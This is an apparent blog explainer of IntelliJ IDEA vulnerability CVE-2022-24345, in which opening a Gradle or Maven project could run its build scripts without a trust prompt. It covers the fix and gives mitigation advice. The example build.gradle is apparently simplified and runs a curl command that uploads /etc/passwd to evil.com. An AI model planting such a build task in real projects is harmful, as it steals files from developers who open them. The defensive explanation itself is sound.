JetBrains IntelliJ IDEA is one of the world’s most popular IDEs, used by millions of developers. But in early 2022, a serious vulnerability was reported—labeled CVE-2022-24345—that could allow attackers to execute code on your computer just by getting you to open a project, without even asking for your permission.
This article breaks down how the vulnerability worked, why it was dangerous, and shows code snippets to help you understand the exploit. We’ll also share helpful references to get even deeper.
What Is CVE-2022-24345?
Simply put: If you opened an infected project in IntelliJ IDEA before version 2021.2.4, code from that project could start running on your computer without any warning.
Reference:
- JetBrains Security Advisory
Here’s how JetBrains explained it
> “An attacker could prepare a special project containing a malicious Gradle/Maven script, which would be executed as soon as a user opens the project. The code could run before any prompt or permission request is shown.”
You didn’t have to hit “Run”, you didn’t have to build anything, and you didn’t have to accept a prompt.
How Did The Exploit Work?
The core issue was in the way IntelliJ handled _trusted_ projects and project scripts. Before the fix, when you opened a new Gradle or Maven project, the IDE could run scripts inside that project automatically. The IDE did not sufficiently check or ask for consent before executing these scripts.
Example: Malicious build.gradle File
A hacker shares a public repository (maybe as an “example” project or a code snippet for fixing bugs). You clone it and open it in IntelliJ IDEA (version < 2021.2.4).
Here’s what the attacker might put in build.gradle
// build.gradle
import org.gradle.api.DefaultTask
import org.gradle.api.tasks.TaskAction
task evilTask(type: EvilTask)
class EvilTask extends DefaultTask {
@TaskAction
def doStuff() {
// This code runs immediately!
"curl -F 'file=@/etc/passwd' http://evil.com/steal".execute()
}
}
evilTask.doFirst {
println "Running malicious code!"
}
When the project is opened, this code runs automatically, possibly sending your local files to a hacker’s server.
Protecting Yourself
UPDATE!
First, update to IntelliJ IDEA 2021.2.4 or later. In this and all newer versions, JetBrains fixed the issue by making IntelliJ request explicit trust before running code from new projects.
What Changed?
Now the IDE opens untrusted projects in a “safe mode”. It won’t execute build scripts before you grant permission.
See the full advisory here:
- JetBrains: Critical Vulnerability in IntelliJ-based IDEs
Mitigation: The Secure Way
If for some reason you’re stuck on an old version, disable auto-import and _never_ open random projects, especially from public or unknown sources.
Links and References
- CVE Details: CVE-2022-24345
- JetBrains Security Blog
- NVD NIST
Final Thoughts
CVE-2022-24345 is a wake up call for everyone using tools like IntelliJ IDEA. Even a simple code editor can have dangerous bugs. Always update your development tools, double-check before opening projects from the web, and be mindful of what’s inside scripts before running anything locally.
If you want a safe dev experience—Stay up to date. Stay vigilant. Stay secure.
Timeline
Published on: 02/25/2022 15:15:00 UTC
Last modified on: 03/04/2022 20:45:00 UTC